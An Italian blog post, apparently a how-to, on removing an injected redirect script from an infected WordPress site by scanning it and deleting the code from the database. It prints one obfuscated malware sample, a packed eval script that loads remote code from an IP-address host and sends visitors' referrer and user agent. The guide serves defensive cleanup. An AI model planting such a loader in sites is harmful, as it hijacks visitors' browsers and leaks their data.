>

WordPress infettato da Malware – In sito risponde ed effettua un redirect verso altri siti – Una soluzione

Pensate che  il vostro Blog WordPress sia infettato da Malware è state cercando una soluzione ?

Il comportamento che voglio illustrarvi oggi è strano ma affatto sconosciuto; praticamente succede questo :

  • Se cercate di collegarvi al vostro sito la prima volta noterete un redirect verso un sito che vi è assolutamente sconosciuto, non necessariamente lo stesso
  • se provate di nuovo il vostro sito risponde regolarmente… salvo ricominciare se lasciate trascorrere qualche ora

Queslla che vi propongo, purtroppo , non è una soluzione “automatica” dovete svolgere un po’ di lavoro ma sembra funzionare a dovere

Come rimuovere malware su WordPress

Il primo passaggio è quello di verificare se effettivamente il vostro sito sia stato infettato da un malware di qualche tipo.

Per fare questo recatevi sul portale di SUCURI alla pagina di controllo WEB… potete fare click direttamente QUI

Scansionare siti wordpress ricerca malware

Sucuri vi restituirà i risultati dei suoi test… se non trova nulla vi segnalerà che non avete di che preoccuparvi, diversamente vi segnalerà le pagine nelle quali rileva codice segnalato come Malware

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etkrr|var|u0026u|referrer|rbith||js|php'.split('|'),0,{}))
</script></noindex>

Quello che vedete è un esempio del codice Malware che potreste trovare all’interno del vostro sito.

A questo, se è il vostro caso,  punto la domanda che certamente vi state facendo da un po’ :

Come rimuovere completamente un malware da WordPress ?

Vi anticipo che per questa operazione dovete necessariamente disporre di queste 2 possibilità :

  • Collegamento al gestore databaseMySql ( remoto o locale : PhpMyAdmin o quello che preferite )
  • Collegamento FTP al sito

( PRIMA DI COMINCIARE – fate un backup completo del sito e del relativo database !!!)

La prima cosa che dovete fare è connettervi al DB MySql ef effettuare una ricerca su tutte le tabelle del vostro DB per una parte ( vi suggerisco eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)} ) o tutto il codice del malware trovato

Quasi certamente troverete il malware su POST e PAGINE… scegliendo Mostra e poi Modifica dovete rimuovere a mano tutto il codice rappresentativo del Malware ( nel mio caso da <noindex>...a</noindex> compresi)

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Rispondiamo a tuttilascia un commento per ricevere dettagli o inviaci una email per proporre la stesura di nuove guide.
%d blogger hanno fatto clic su Mi Piace per questo: